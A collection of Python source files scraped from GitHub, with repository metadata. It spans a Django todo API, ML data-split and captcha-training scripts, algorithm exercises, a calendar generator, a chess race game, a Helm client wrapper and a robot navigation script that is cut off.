output\n\n\n\n\n","repo_name":"augmentedstartups/AS-One","sub_path":"asone/detectors/yolov6/yolov6/utils/yolov6_utils.py","file_name":"yolov6_utils.py","file_ext":"py","file_size_in_byte":9628,"program_lang":"python","lang":"en","doc_type":"code","stars":534,"dataset":"github-code","pt":"72"} +{"seq_id":"6405545577","text":"from django.shortcuts import render\nfrom rest_framework.decorators import api_view\nfrom rest_framework.response import Response \nfrom django.http import JsonResponse \nfrom .models import Todo\nfrom .serialaizers import TodoSerializer\n@api_view(['GET'])\ndef Todoview(request):\n    todos = Todo.objects.all()\n    serializer = TodoSerializer(todos, many=True)\n    return Response(serializer.data)\n\n@api_view(['GET'])\ndef TodoDetail(request,pk):\n    todo = Todo.objects.get(id=pk)\n    serializer = TodoSerializer(todo, many=False)\n    return Response(serializer.data)\n\n\n@api_view(['POST'])\ndef TodoCreate(request):\n    serializer = TodoSerializer(data=request.data)\n    if serializer.is_valid():\n        serializer.save()\n    return Response(serializer.data)\n\n\n@api_view(['POST'])\ndef TodoUpdate(request,pk):\n    todo = Todo.objects.get(id=pk)\n    serializer = TodoSerializer(instance=todo, data=request.data)\n    if serializer.is_valid():\n        serializer.save()\n    return Response(serializer.data)\n\n\n@api_view(['DELETE'])\n\ndef TodoDelete(request,pk):\n    todo = Todo.objects.get(id=pk)\n    todo.delete()\n    return Response(\"Item successfully deleted\")","repo_name":"Kiash254/django-react","sub_path":"api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1150,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"34538663098","text":"import sys\nimport os\nimport glob\nimport json\n\nimport numpy as np\nimport pandas as pd\nimport sklearn.model_selection\n\nfrom utils.data_utils import get_iaga_data, get_omni_data\n\nBUCKETS = 100\nLENGTH = 600\nLAG = 1\n\ndef get_sequences(df, length, lag):\n    _df = df.copy()\n    _df['cluster'] = (_df['seconds'].diff() != 60).cumsum()\n    f = _df.groupby(['cluster']).apply(lambda x: x[:len(x)-length-lag]['index']).reset_index(drop=True)\n    t = _df.groupby(['cluster']).apply(lambda x: x[length+lag:]['index']).reset_index(drop=True)\n    \n    assert (t-f).max() == (t-f).min() == (length+lag)\n\n    return list(zip(f, t))\n\npath = sys.argv[1]\nprint(f'loading from path {path}')\n\ndates, data, features = get_iaga_data(path, load_data=False)\n\ndf = pd.DataFrame()\ndf['seconds'] = dates\ndf['dates'] = pd.to_datetime(df['seconds'], unit='s', errors='coerce')\n\ndf['index'] = range(len(df))\nbucket_size = len(df)//BUCKETS\ndf['bucket'] = (((df['index']%bucket_size)==0) & (df['index'] > 0)).cumsum()\n\ntrain, test_val = sklearn.model_selection.train_test_split(list(range(BUCKETS+1)), train_size=0.8)\ntest, val = sklearn.model_selection.train_test_split(test_val, train_size=0.5)\n\ndf.loc[df['bucket'].isin(train), 'split'] = 'train'\ndf.loc[df['bucket'].isin(test), 'split'] = 'test'\ndf.loc[df['bucket'].isin(val), 'split'] = 'val'\n\ntrain_df = df.loc[df['split'] == 'train']\ntest_df = df.loc[df['split'] == 'test']\nval_df = df.loc[df['split'] == 'val']\n\n# make sure omni and iaga have the same dates\n# test if it matches omni\nfor year in pd.unique(df['dates'].dt.year):\n    print(f'testing {year}')\n    omni = get_omni_data(\"data_local/omni/sw_data.h5\", year=f'{year}')\n    assert len(df.loc[df['dates'].dt.year==year]) == len(omni)\nprint('testing done')\n\ntrain_idx = get_sequences(train_df, LENGTH, LAG)\ntest_idx = 
get_sequences(test_df, LENGTH, LAG)\nval_idx = get_sequences(val_df, LENGTH, LAG)\n\nwith open('train.txt', 'w') as f: \n    json.dump({\n        \"length\": LENGTH,\n        \"lag\": LAG,\n        \"years\": pd.unique(df['dates'].dt.year).tolist(),\n        \"idx\": train_idx,\n    }, f)\n\nwith open('test.txt', 'w') as f: \n    json.dump({\n        \"length\": LENGTH,\n        \"lag\": LAG,\n        \"years\": pd.unique(df['dates'].dt.year).tolist(),\n        \"idx\": test_idx\n    }, f)\n\nwith open('val.txt', 'w') as f: \n    json.dump({\n        \"length\": LENGTH,\n        \"lag\": LAG,\n        \"years\": pd.unique(df['dates'].dt.year).tolist(),\n        \"idx\": val_idx\n    }, f)","repo_name":"ptigas/geoeffectivenet","sub_path":"scripts/prepare_splits.py","file_name":"prepare_splits.py","file_ext":"py","file_size_in_byte":2445,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"21216021148","text":"#coding=utf-8\n\nimport tensorflow as tf\nfrom PIL import Image\nimport numpy as np\nimport argparse\nfrom tensorflow.python.framework.errors_impl import NotFoundError\nfrom trainForward import forward\nimport os\nfrom ErrorClass import TestException,TrainException\nimport random\nfrom config import args\n\nclass Train:\n\n    def __init__(self,args):\n        self.args=args\n        self.train_images_list = os.listdir(args.PATH_TRAIN)\n        self.test_images_list = os.listdir(args.PATH_TEST)\n        self.train_len=len(os.listdir(args.PATH_TRAIN))\n        self.test_len = len(os.listdir(args.PATH_TEST))\n\n    def img2gray(self,path,filename):\n        \"\"\"\n        Description: convert the image to grayscale and return it as an array\n        :param img:\n        :return:\n        \"\"\"\n        img_file = os.path.join(path, filename)\n        img=np.array(Image.open(img_file))\n        if img.shape[2]==3:\n            r, g, b = img[:, :, 0], img[:, :, 1], img[:, :, 2]\n            gray = 0.2989 * r + 0.5870 * g + 0.1140 * b\n            return gray.reshape(self.args.IMG_H,self.args.IMG_W,self.args.IMG_C)\n        else:\n            return img.reshape(self.args.IMG_H,self.args.IMG_W,self.args.IMG_C)\n\n    def text2OneHot(self,text):\n        \"\"\"\n        Description: convert the text into a one-hot array\n        :param text:\n        :return:\n        \"\"\"\n        length=len(text)\n        if len(text)!=self.args.MAX_CAPTCHA:\n            raise TrainException(\"The captcha does not have the required length\")\n        # 4*36\n        vector = np.zeros(shape=self.args.MAX_CAPTCHA*self.args.CHAR_LEN)\n        for i, item in enumerate(text):\n            index=self.args.CHAR_LEN*i\n            index=index+self.args.CHAR_SET.index(item)\n            vector[index]=1\n        return vector\n\n    def getBatch(self,batch,is_train=True):\n        \"\"\"\n        Fetch a batch of training or test data\n        :return:\n        \"\"\"\n        # 128 * 100 * 60 * 1\n        #batch_labels=[]\n        batch_inputs=np.zeros(shape=[self.args.BATCH_SIZE,self.args.IMG_H,self.args.IMG_W,self.args.IMG_C],dtype=np.float32)\n        batch_labels=np.zeros(shape=[self.args.BATCH_SIZE,self.args.CHAR_LEN*self.args.MAX_CAPTCHA],dtype=np.float32)\n        # maximum number of batches\n        max_batch=int(self.args.STEPS/self.args.BATCH_SIZE)\n\n        if max_batch<1:\n            raise TrainException(\"Too few training or test images, not enough for a single batch!\")\n        if batch > max_batch-1:\n            batch=batch%max_batch\n\n        a_index=batch*self.args.BATCH_SIZE\n        b_index=(batch+1)*self.args.BATCH_SIZE\n        if is_train==True:\n            if a_index > self.train_len:\n                a_index = a_index - self.train_len\n                b_index = b_index - self.train_len\n        else:\n            if a_index>self.test_len:\n                a_index=a_index-self.test_len\n                b_index=b_index-self.test_len\n        thisBatch=[]\n        if is_train==True:\n            thisBatch=self.train_images_list[a_index:b_index]\n        else:\n            thisBatch = self.test_images_list[a_index:b_index]\n        for i, filename in enumerate(thisBatch):\n            inputs=self.img2gray(self.args.PATH_TRAIN if is_train else self.args.PATH_TEST,filename)\n            label = self.text2OneHot(filename.split('_')[1])\n            batch_inputs[i, :, :, :] = inputs / 255\n            batch_labels[i, :] = label\n        return 
batch_labels, batch_inputs\n\n    def getBatchTest(self):\n        \"\"\"\n        Fetch a batch of test data\n        :return: labels, inputs\n        \"\"\"\n        batch_inputs = np.zeros(shape=[self.args.BATCH_SIZE, self.args.IMG_H, self.args.IMG_W, self.args.IMG_C],dtype=np.float32)\n        # 128 * 144\n        batch_labels = np.zeros(shape=[self.args.BATCH_SIZE, self.args.CHAR_LEN * self.args.MAX_CAPTCHA],dtype=np.float32)\n        if len(self.test_images_list)>> \".format(i))\n                    print(\"[train set] character accuracy {:.5f} image accuracy {:.5f} >>> loss {:.10f}\".format(acc_char, acc_img, cost_))\n\n                    # evaluation on the validation set\n                    batch_label_verify, batch_input_verify = self.getBatchTest()\n                    acc_char,acc_img = sess.run([accuracy_char_count,accuracy_image_count],\n                                                feed_dict={inputs: batch_input_verify,y_labels: batch_label_verify, is_train: False})\n                    #print(\"training round {} >>> \".format(step))\n                    print(\"[validation set] character accuracy {:.5f} image accuracy {:.5f} >>> loss {:.10f}\".format(acc_char, acc_img, cost_))\n                    # save and stop once the accuracy reaches 99%\n                    if acc_char > 0.99:\n                        saver.save(sess, self.args.PATH_MODEL)\n                        print(\"Validation accuracy reached 99%, model saved\")\n                        break\n                    # save once every 500 training rounds\n                    if i % 500 == 0:\n                        saver.save(sess, self.args.PATH_MODEL)\n                        print(\"Periodic model save succeeded\")\n                step += 1\n            saver.save(sess, self.args.PATH_MODEL)\n\ntrain=Train(args)\ntrain.train()\n\n\n","repo_name":"mr-zhouzhouzhou/VerificationCode","sub_path":"code/Training.py","file_name":"Training.py","file_ext":"py","file_size_in_byte":8050,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"14771566714","text":"#Program Requirements:\n#Return the number of min \n#inserts/deletes/adds to change \n#string A (first input) into \n#string B (second input).\na = \"\"\nb = \"\"\nmax = 9999999\nmemo = [[]]\ncost = [0,1,1,1] #Array is Skip, Delete, Insert, Replace\ndef dist():\n\tglobal a,b,max,memo,cost\n\tfor i in range(len(a)):\n\t\tfor j in range(len(b)):\n\t\t\tif i == 0 and j == 0: #Starting with empty string compared to an empty string\n\t\t\t\tmemo[i][j] = 0\n\t\t\telse:\n\t\t\t\tif i == 0: #Inserting to an empty string\n\t\t\t\t\tmemo[i][j] = memo[i][j-1]+cost[2]\n\t\t\t\telif j == 0: #Deleting to an empty string\n\t\t\t\t\tmemo[i][j] = memo[i-1][j]+cost[1]\n\t\t\t\telse:\n\t\t\t\t\tif a[i] == b[j]: #Skipping\n\t\t\t\t\t\tmemo[i][j] = memo[i-1][j-1]\n\t\t\t\t\telse:\n\t\t\t\t\t\tmemo[i][j] = min((memo[i-1][j]+cost[1]),(memo[i][j-1]+cost[2]),(memo[i-1][j-1]+cost[3]))\n\ndef main():\n\tglobal a, b, max, memo, cost\n\tfor _ in range(int(input())):\n\t\ta = \" \" + input()\n\t\tb = \" \" + input()\n\t\t#memo is indexed as memo[i][j] with i over a and j over b\n\t\tmemo = [[max for y in range(len(b))] for x in range(len(a))]\n\t\tdist()\n\t\tprint(memo[len(a)-1][len(b)-1])\nmain()","repo_name":"backpack5689/Competition-Programming-Class","sub_path":"Dynamic Programming/StringCorrection.py","file_name":"StringCorrection.py","file_ext":"py","file_size_in_byte":1006,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"20539009928","text":"#User function Template for python3\n\nclass Solution:\n    \"\"\"\n    m - puzzle \n    x - row \n    y - column\n    n - size of puzzle \n    v - visited array\n    s - solution string\n    \"\"\"\n    # determines whether a given coordinate x, y is safe or not\n    def isSafe(self, m, x, y, n, v):\n        if (x < n and x >= 0) and (y < n and y >= 0):\n            if m[x][y] == 1 and v[x][y] != 1:\n                return True\n        return False 
    \n    \n    def solve(self, m, x, y, n, v, s, ans):\n        # check if start is zero\n        if m[0][0] == 0:\n            return ans\n\n        # append string in ans if end of puzzle is reached \n        if x == n - 1 and y == n - 1:\n            ans.append(s)\n            return\n\n        # DLRU moves\n        i = [x + 1, x, 
x, x - 1]\n j = [y, y - 1, y + 1, y]\n moves = [\"D\", \"L\", \"R\", \"U\"]\n # setting visited as true \n v[x][y] = 1\n for a in range(4):\n if self.isSafe(m, i[a], j[a], n, v):\n self.solve(m, i[a], j[a], n, v, s + moves[a], ans) \n \n # backtracking\n v[x][y] = 0 \n \n\n def findPath(self, m, n):\n # visited array\n v = [[0 for i in range(n)] for i in range(n)]\n\n # ans array to keep track of all answers \n ans = []\n\n # solving the puzzle \n self.solve(m, 0, 0, n, v, \"\", ans)\n return ans\n\n#{ \n # Driver Code Starts\n#Initial Template for Python 3\n\nif __name__=='__main__':\n t = int(input())\n for i in range(t):\n n = list(map(int, input().strip().split()))\n arr = list(map(int, input().strip().split()))\n \n matrix = [[0 for i in range(n[0])]for j in range(n[0])]\n k=0\n for i in range(n[0]):\n for j in range(n[0]):\n matrix[i][j] = arr[k]\n k+=1\n ob = Solution()\n result = ob.findPath(matrix, n[0])\n print(result)\n# result.sort()\n# if len(result) == 0 :\n# print(-1)\n# else:\n# for x in result:\n# print(x,end = \" \")\n# print()\n# # } Driver Code Ends","repo_name":"OsafAliSayed/DSA","sub_path":"Backtracking/ratinmaze.py","file_name":"ratinmaze.py","file_ext":"py","file_size_in_byte":2140,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"40852351335","text":"from jinja2 import Template\nimport calendar\nimport os\n\nFOLDER_NAME = '5_semester'\nmonth_names = ['იანვარი', 'თებერვალი', 'მარტი', 'აპრილი', 'მაისი', 'ივნისი', 'ივლისი', 'აგვისტო', 'სექტემბერი', 'ოქტომბერი', 'ნოემბერი', 'დეკემბერი']\nyear = 2023 # start year\nmonth = 9 # start month\nn, max_n = -2, 20 # range for n\n\ndef get_year_and_month(year, month):\n months_sum = year * 12 + month - 1\n return months_sum // 12, months_sum % 12 + 1\n\n\nhtml_cal = calendar.HTMLCalendar(firstweekday = 0)\n\nwith open('./template.html', 'r', encoding='utf-8') as f:\n t = Template(f.read())\n\nif not os.path.isdir(FOLDER_NAME):\n os.makedirs(FOLDER_NAME)\n\nfor month_count in range(9):\n y, m = get_year_and_month(year, month + month_count)\n rows = html_cal.formatmonth(y, m).split('\\n')[3:-2]\n\n content = {\n 'month': f'{month_names[m-1]} {y}',\n 'row_height': 660//len(rows),\n 'table': ''}\n for line in rows:\n content['table'] += f'\\t\\t\\t{line[:4]} {n if 0 < n <= max_n else \"\"} {line[4:]}\\n'\n n += 1\n else:\n if 'noday' in line:\n n -= 1\n content['table'] = content['table'][:-1]\n \n # print(t.render(**content))\n\n with open(f'./{FOLDER_NAME}/{y}_{m}.html', 'w', encoding='utf-8') as f:\n f.write(t.render(**content))\n","repo_name":"datotoda/calendar_generator","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1478,"program_lang":"python","lang":"ka","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"2547695440","text":"# Author: Cory Apperson\n# GitHub username: appersoncory\n# Date: 08/17/2023\n# Description: A game played on a chess board, where the players race their kings to the top row.\n\nclass ChessRaceGame:\n def __init__(self):\n \"\"\"Initializes the game, creating the board,setting the starting player, and game state,\"\"\"\n self._board = {\n # Use a dictionary to represent the board, since each space can only have one piece.\n 'a1': 'WK', 'b1': 'WB', 'c1': 'WN', 'd1': None, 'e1': None, 'f1': 'BN', 'g1': 'BB', 'h1': 'BK',\n 'a2': 'WR', 'b2': 'WB', 'c2': 'WN', 'd2': None, 'e2': None, 'f2': 'BN', 'g2': 'BB', 'h2': 'BR',\n 'a3': None, 'b3': None, 'c3': None, 'd3': None, 'e3': None, 'f3': None, 
'g3': None, 'h3': None,\n 'a4': None, 'b4': None, 'c4': None, 'd4': None, 'e4': None, 'f4': None, 'g4': None, 'h4': None,\n 'a5': None, 'b5': None, 'c5': None, 'd5': None, 'e5': None, 'f5': None, 'g5': None, 'h5': None,\n 'a6': None, 'b6': None, 'c6': None, 'd6': None, 'e6': None, 'f6': None, 'g6': None, 'h6': None,\n 'a7': None, 'b7': None, 'c7': None, 'd7': None, 'e7': None, 'f7': None, 'g7': None, 'h7': None,\n 'a8': None, 'b8': None, 'c8': None, 'd8': None, 'e8': None, 'f8': None, 'g8': None, 'h8': None\n }\n self._turn_color = \"WHITE\"\n self._game_state = \"UNFINISHED\"\n self._white_pending_win = False\n\n def get_board(self):\n \"\"\"Returns the current chess board\"\"\"\n return self._board\n\n def get_turn_color(self):\n \"\"\"Gets the color whose turn it is\"\"\"\n return self._turn_color\n\n def set_turn_color(self, color):\n \"\"\"Sets the turn to the given color\"\"\"\n self._turn_color = color\n\n def get_game_state(self):\n \"\"\"Returns the state of the game, e.g. 'UNFINISHED', 'WHITE_WON' \"\"\"\n return self._game_state\n\n def set_game_state(self, state):\n \"\"\"Sets the state of the game, e.g. 'UNFINISHED', 'WHITE_WON' \"\"\"\n self._game_state = state\n\n def get_white_pending_win(self):\n \"\"\"Returns whether the white player has a king in the top row, pending a win\"\"\"\n return self._white_pending_win\n\n def set_white_pending_win(self, state):\n \"\"\"Sets whether the white player has a king in the top row, pending a win\"\"\"\n self._white_pending_win = state\n\n def is_valid_move(self, start, end):\n \"\"\"Determines if a move is valid.\"\"\"\n\n piece = self.get_board()[start]\n\n if not piece:\n return False # No piece at the start position\n\n color = \"WHITE\" if piece[0] == \"W\" else \"BLACK\"\n\n if color != self.get_turn_color():\n return False # Wrong player's turn\n\n if self.get_board()[end]:\n if self.get_board()[start][0] == self.get_board()[end][0]:\n return False # Destination has a piece of the same color\n\n # Call the corresponding method for each piece type\n if piece[1] == \"K\":\n valid = self.is_valid_king_move(start, end)\n elif piece[1] == \"R\":\n valid = self.is_valid_rook_move(start, end)\n elif piece[1] == \"N\":\n valid = self.is_valid_knight_move(start, end)\n elif piece[1] == \"B\":\n valid = self.is_valid_bishop_move(start, end)\n else:\n valid = False\n\n if valid:\n # Temporarily make the move and check for check status\n captured_piece = self._board[end]\n self.get_board()[end] = piece\n self.get_board()[start] = None\n is_white_in_check = self.is_king_in_check(\"WHITE\")\n is_black_in_check = self.is_king_in_check(\"BLACK\")\n # Revert the move\n self.get_board()[start] = piece\n self.get_board()[end] = captured_piece\n\n if is_white_in_check or is_black_in_check:\n return False # Can't make a move that puts own king in check\n\n return valid\n\n def is_valid_move_ignoring_checks(self, start, end):\n \"\"\"Determines if a move is valid, ignoring possible king checks. 
Used when determining possible king checks.\"\"\"\n\n piece = self.get_board()[start]\n # Call the corresponding method for each piece type\n if piece[1] == \"K\":\n valid = self.is_valid_king_move(start, end)\n elif piece[1] == \"R\":\n valid = self.is_valid_rook_move(start, end)\n elif piece[1] == \"N\":\n valid = self.is_valid_knight_move(start, end)\n elif piece[1] == \"B\":\n valid = self.is_valid_bishop_move(start, end)\n else:\n valid = False\n\n return valid\n\n # Placeholder methods for individual piece move validations\n def is_valid_king_move(self, start, end):\n \"\"\"Return true if this is a valid move for the king\"\"\"\n\n # Get column and row for start and end\n start_col, start_row = ord(start[0]) - ord('a'), int(start[1])\n end_col, end_row = ord(end[0]) - ord('a'), int(end[1])\n\n # Check if the destination is a neighboring square\n col_diff = abs(start_col - end_col)\n row_diff = abs(start_row - end_row)\n\n # The king can move to any of its 8 neighboring squares\n if col_diff > 1 or row_diff > 1:\n return False\n\n return True\n\n def is_valid_rook_move(self, start, end):\n \"\"\"Return true if this is a valid move for the rook\"\"\"\n\n current_board = self.get_board()\n start_col, start_row = ord(start[0]) - ord('a'), int(start[1])\n end_col, end_row = ord(end[0]) - ord('a'), int(end[1])\n\n # Check if the move is either horizontal or vertical\n if start_col != end_col and start_row != end_row:\n return False # Rook can't move diagonally\n\n # Check if there's any piece in between the start and end squares\n if start_row == end_row: # Horizontal move\n step = 1 if start_col < end_col else -1\n for col in range(start_col + step, end_col, step):\n if current_board[chr(col + ord('a')) + str(start_row)]:\n return False # There's a piece blocking the path\n else: # Vertical move\n step = 1 if start_row < end_row else -1\n for row in range(start_row + step, end_row, step):\n if current_board[start[0] + str(row)]:\n return False # There's a piece blocking the path\n\n return True\n\n def is_valid_knight_move(self, start, end):\n \"\"\"Return true if this is a valid move for the knight\"\"\"\n\n current_board = self.get_board()\n start_col, start_row = ord(start[0]) - ord('a'), int(start[1])\n end_col, end_row = ord(end[0]) - ord('a'), int(end[1])\n\n col_diff = abs(start_col - end_col)\n row_diff = abs(start_row - end_row)\n\n # Check for the \"L\" shaped move of the knight\n if (col_diff == 2 and row_diff == 1) or (col_diff == 1 and row_diff == 2):\n return True\n\n return False\n\n def is_valid_bishop_move(self, start, end):\n \"\"\"Return true if this is a valid move for the bishop\"\"\"\n\n current_board = self.get_board()\n start_col, start_row = ord(start[0]) - ord('a'), int(start[1])\n end_col, end_row = ord(end[0]) - ord('a'), int(end[1])\n\n col_diff = abs(start_col - end_col)\n row_diff = abs(start_row - end_row)\n\n # Check for diagonal movement\n if col_diff != row_diff:\n return False\n\n col_step = 1 if start_col < end_col else -1\n row_step = 1 if start_row < end_row else -1\n\n current_col, current_row = start_col + col_step, start_row + row_step\n\n # Check for any pieces in the path\n while current_col != end_col and current_row != end_row:\n if current_board[chr(current_col + ord('a')) + str(current_row)]:\n return False # There's a piece blocking the path\n current_col += col_step\n current_row += row_step\n\n return True\n\n def is_king_in_check(self, color):\n \"\"\"Determines if the king of the specified color is in check.\"\"\"\n\n current_board = 
self.get_board()\n\n # Finding the king's position based on the color\n king_position = None\n for pos, piece in current_board.items():\n if piece:\n if color == \"WHITE\" and piece[0] == \"W\":\n if piece[1] == \"K\":\n king_position = pos\n break\n elif color == \"BLACK\" and piece[0] == \"B\":\n if piece[1] == \"K\":\n king_position = pos\n break\n\n # Check if any of the opponent's pieces can make a valid move to the king's position\n for pos, piece in current_board.items():\n if piece:\n if (piece[0] == \"W\" and color == \"BLACK\") or (piece[0] == \"B\" and color == \"WHITE\"): # Opponent's piece\n # Temporarily set the piece at the king's position to None to allow capturing move check\n target_piece = current_board[king_position]\n current_board[king_position] = None\n if self.is_valid_move_ignoring_checks(pos, king_position):\n # Reset the piece at the king's position and return True\n current_board[king_position] = target_piece\n print(\"Can't move here, would put king in check.\")\n return True\n # Reset the piece at the king's position\n current_board[king_position] = target_piece\n return False\n\n def make_move(self, start, end):\n \"\"\"Moves the piece from the first position to the second position, checking for winners and changing turn.\"\"\"\n\n if self.get_game_state() != \"UNFINISHED\":\n return False\n\n if not self.is_valid_move(start, end):\n return False\n\n # move piece and capture if necessary\n self.get_board()[end] = self.get_board()[start]\n self.get_board()[start] = None\n\n # update game state\n # Check if the moved piece was a King, and if it was moved to the top row.\n if self.get_board()[end][1] == \"K\" and end[1] == \"8\":\n if self.get_turn_color() == \"WHITE\": # White moved king to the top, they are about to win.\n self.set_white_pending_win(True)\n else:\n if self.get_white_pending_win(): # Black moved king to the top\n self.set_game_state(\"TIE\") # Check if white's king is at the top, for a tie.\n else:\n self.set_game_state(\"BLACK_WON\") # Otherwise, black wins\n\n # switch turn\n self.set_turn_color(\"BLACK\") if self.get_turn_color() == \"WHITE\" else self.set_turn_color(\"WHITE\")\n\n # If it just became white's turn, and white is pending a win, and\n # black hasn't won, white wins.\n if self.get_white_pending_win() and self.get_game_state() == \"UNFINISHED\" and self.get_turn_color() == \"WHITE\":\n self.set_game_state(\"WHITE_WON\")\n\n return True\n\n # Optional print board function for debugging\n def print_board(self):\n \"\"\"Prints the current board state with column labels at the bottom and row labels on the left.\"\"\"\n\n for i in range(8, 0, -1): # Start from the top row (8th) and go downwards\n row = [str(i)] # Start each row with its row number\n for j in ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h']:\n position = j + str(i)\n piece = self.get_board()[position]\n row.append(piece if piece else \"..\")\n print(\" \".join(row))\n\n # After printing all rows, print the column labels at the bottom\n print(\" a b c d e f g h\")\n\n\ndef main():\n game = ChessRaceGame()\n print(\"Welcome to Chess Racing!\")\n game.print_board()\n\n while game.get_game_state() == \"UNFINISHED\":\n start_pos = input(f\"{game.get_turn_color()}'s turn. Enter start position (e.g. 'a2'): \")\n end_pos = input(f\"Enter end position (e.g. 'a3'): \")\n\n if game.make_move(start_pos, end_pos):\n game.print_board()\n else:\n print(\"Invalid move. 
Please try again.\")\n\n game_state = game.get_game_state()\n if game_state != \"UNFINISHED\":\n if game_state == \"TIE\":\n print(\"It's a tie!\")\n else:\n print(f\"{game_state.replace('_', ' ')}!\")\n break\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"appersoncory/ChessRace","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":12624,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"3661662193","text":"import os\nimport subprocess\nimport requests\nimport shlex\n\nfrom requests.auth import HTTPBasicAuth\nfrom ruamel.yaml import YAML\nfrom ruamel.yaml.comments import CommentedMap\nfrom packaging import version\n\nfrom .kubernetes import KubernetesClient\n\n\ndef flatten_values(values, prefix=''):\n data = []\n for key, value in values.items():\n label = '%s.%s' % (prefix, key) if prefix else key\n comment = values.ca.get(key, 2)\n if type(values[key]) == CommentedMap:\n data += flatten_values(values[key], label)\n else:\n data.append({'label': label,\n 'default': value,\n 'type': 'int' if type(value) == int else 'str',\n 'help': comment.value.lstrip('#').strip() if comment else ''})\n return data\n\ndef unflatten_values(data):\n values = {}\n for item in data:\n value_dict = values\n key = item['label']\n while '.' in key:\n prefix, key = key.split('.', 1)\n if prefix not in value_dict.keys():\n value_dict[prefix] = {}\n value_dict = value_dict[prefix]\n value_dict[key] = int(item['value']) if ('type' in item.keys() and item['type'] == 'int') else item['value']\n return values\n\nclass HelmLocalRepoClient(object):\n def __init__(self, repo_name, repo_path):\n self._repo_name = repo_name\n self._repo_path = repo_path\n\n def _load_yaml(self, yaml_path):\n if not os.path.isfile(yaml_path):\n return None\n try:\n with open(yaml_path, 'rb') as f:\n return YAML().load(f)\n except:\n return None\n\n def list(self, latest_only=True):\n result = {}\n for chart_path in [os.path.join(d.path, 'Chart.yaml') for d in os.scandir(self._repo_path) if d.is_dir()]:\n chart_info = self._load_yaml(chart_path)\n if not chart_info:\n continue\n result[chart_info['name']] = chart_info\n\n return result\n\n def values(self, name):\n chart_name = os.path.join(self._repo_path, name)\n return chart_name, self._load_yaml(os.path.join(chart_name, 'values.yaml'))\n\nclass HelmRemoteRepoClient(object):\n def __init__(self, repo_name, repo_url, repo_username='admin', repo_password=''):\n self._repo_name = repo_name\n self._repo_url = repo_url\n self._repo_auth = HTTPBasicAuth(repo_username, repo_password) if repo_password else None\n\n def _request(self, method, url, **kwargs):\n kwargs.setdefault('verify', False if os.environ.get('VIRTUAL_ENV') else True) # XXX Do not verify if running in virtual environment.\n kwargs.setdefault('timeout', 30)\n response = requests.request(method, url, **kwargs)\n response.raise_for_status()\n return response\n\n def _get(self, path, params={}):\n response = self._request('get', '%s/%s' % (self._repo_url, path.lstrip('/')), auth=self._repo_auth, params=params)\n return YAML(typ='safe').load(response.text)\n\n def _local_repo_list(self):\n command = 'helm repo list -o yaml'\n try:\n result = subprocess.check_output(command, shell=True)\n return YAML(typ='safe').load(result)\n except:\n return []\n\n def _local_repo_add(self):\n command = 'helm repo add %s --username=%s --password=%s %s %s' % ('--insecure-skip-tls-verify' if os.environ.get('VIRTUAL_ENV') else '', # XXX Do not verify if 
running in virtual environment.\n self._repo_auth.username,\n shlex.quote(self._repo_auth.password),\n self._repo_name,\n self._repo_url)\n subprocess.check_output(command, shell=True)\n\n def _local_repo_update(self):\n command = 'helm repo update %s' % self._repo_name\n subprocess.check_output(command, shell=True)\n\n def list(self, latest_only=True):\n result = self._get('index.yaml')\n if not latest_only:\n return result['entries']\n return {name: max(versions, key=lambda x: version.parse(x['version'])) for name, versions in result['entries'].items()}\n\n def values(self, name):\n if not next((repo for repo in self._local_repo_list() if repo['name'] == self._repo_name), None):\n self._local_repo_add()\n self._local_repo_update()\n\n chart_name = '%s/%s' % (self._repo_name, name)\n command = 'helm show values %s %s' % ('--insecure-skip-tls-verify' if os.environ.get('VIRTUAL_ENV') else '', # XXX Do not verify if running in virtual environment.\n chart_name)\n result = subprocess.check_output(command, shell=True)\n return chart_name, YAML().load(result)\n\nclass HelmClient(object):\n def __init__(self, kubernetes_client=None):\n self.kubernetes_client = kubernetes_client if kubernetes_client else KubernetesClient()\n\n def list(self, namespace):\n command = 'helm list -o yaml -n %s' % namespace\n result = subprocess.check_output(command, shell=True)\n releases = YAML().load(result)\n for release in releases:\n del(release['updated']) # We already have this as a datetime object.\n return releases\n\n def values(self, namespace, name):\n command = 'helm get values -o yaml -n %s %s' % (namespace, name)\n result = subprocess.check_output(command, shell=True)\n return YAML().load(result)\n\n def install(self, namespace, name, chart_name, values_file, wait=True, timeout='20m'):\n command = 'helm upgrade -i %s %s %s -n %s -f %s %s %s' % ('--insecure-skip-tls-verify' if os.environ.get('VIRTUAL_ENV') else '', # XXX Do not verify if running in virtual environment.\n '--atomic --wait' if wait else '',\n ('--timeout %s' % timeout) if timeout else '',\n namespace,\n values_file,\n name,\n chart_name)\n subprocess.check_output(command, shell=True, stderr=subprocess.STDOUT)\n\n def uninstall(self, namespace, name, wait=True, timeout='20m'):\n command = 'helm uninstall %s %s -n %s %s' % ('--wait' if wait else '',\n ('--timeout %s' % timeout) if timeout else '',\n namespace,\n name)\n subprocess.check_output(command, shell=True, stderr=subprocess.STDOUT)\n","repo_name":"CARV-ICS-FORTH/knot","sub_path":"dashboard/utils/helm.py","file_name":"helm.py","file_ext":"py","file_size_in_byte":7027,"program_lang":"python","lang":"en","doc_type":"code","stars":33,"dataset":"github-code","pt":"72"} +{"seq_id":"32181063614","text":"#Auteurs: Alexandre Carle et Louis-philippe Rousseau\n#Dernier changement 19 décembre 2022\n\nfrom time import sleep\nfrom Robot import Robot\nfrom Navigation import Navigation\nfrom icm20948 import ICM20948\nfrom RadioNavigation import RadioNavigation\nfrom Lidar import Lidar\nfrom Direction import Direction\n\n\nen_marche = True\n\nimu = ICM20948()\nangle = 0\nnavigation = Navigation(imu, en_marche)\nradioNavigation = RadioNavigation(en_marche)\nlidar = 